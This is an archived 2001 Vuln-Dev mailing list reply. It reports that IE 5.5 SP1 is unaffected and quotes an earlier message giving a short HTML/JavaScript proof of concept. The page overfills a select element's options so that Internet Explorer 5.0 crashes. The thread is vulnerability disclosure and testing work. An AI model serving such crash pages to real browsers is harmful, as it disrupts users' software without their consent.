Vulnerability Development mailing list archives
RE: IE 5.0 vulnerability
From: "Uidam, T (Tim)" <Tim.Uidam () SYD RABOBANK COM>
Date: Wed, 23 May 2001 07:06:35 +0800
Seems IE 5.5 SP1 (v5.5.4522.1800) on WinNT4 Sp5 is not susceptible... Regards, Tim. -----Original Message----- From: Thomas Magnum [mailto:dr_oo_py () hotmail com] Sent: Wednesday, 23 May 2001 1:44 To: VULN-DEV () securityfocus com Subject: I: IE 5.0 vulnerability I found out a vulnerability for IE 5.0, don't know if it was already discovered (if so, forget this). It seems that the problem is javascript. I don't know if it is exploitable, but if I try to open an html file like this: <script> function crashme() { var i, opt; for(i = 0; i < 7; i++) { opt = new Option('crashing...', i); document.vulnForm.p_select.options[i] = opt; document.vulnForm.p_select.options[i].selected = true; } } </script> <html> <head> <title>IE 5.0 Vulnerability</title> </head> <body> <form name="vulnForm"> <table width="100%" border="0"> <tr> <td align="center"> <select name="p_select" size="5" multiple> <option>__________________</option> </select> </td> </tr> <tr> <td align="center"> <input type="button" name="cmd" value="go!" onClick="crashme()"> </td> </tr> </table> </form> </body> </html> I get the classical Winxx error... I noticed that IE crashes when I try to put in the select at least 3 items more than its size. ================================================================== De informatie opgenomen in dit bericht kan vertrouwelijk zijn en is uitsluitend bestemd voor de geadresseerde. Indien u dit bericht onterecht ontvangt wordt u verzocht de inhoud niet te gebruiken en de afzender direct te informeren door het bericht te retourneren. ================================================================== The information contained in this message may be confidential and is intended to be exclusively for the addressee. Should you receive this message unintentionally, please do not use the contents herein and notify the sender immediately by return e-mail. ==================================================================
Current thread:
- RE: IE 5.0 vulnerability Uidam, T (Tim) (May 22)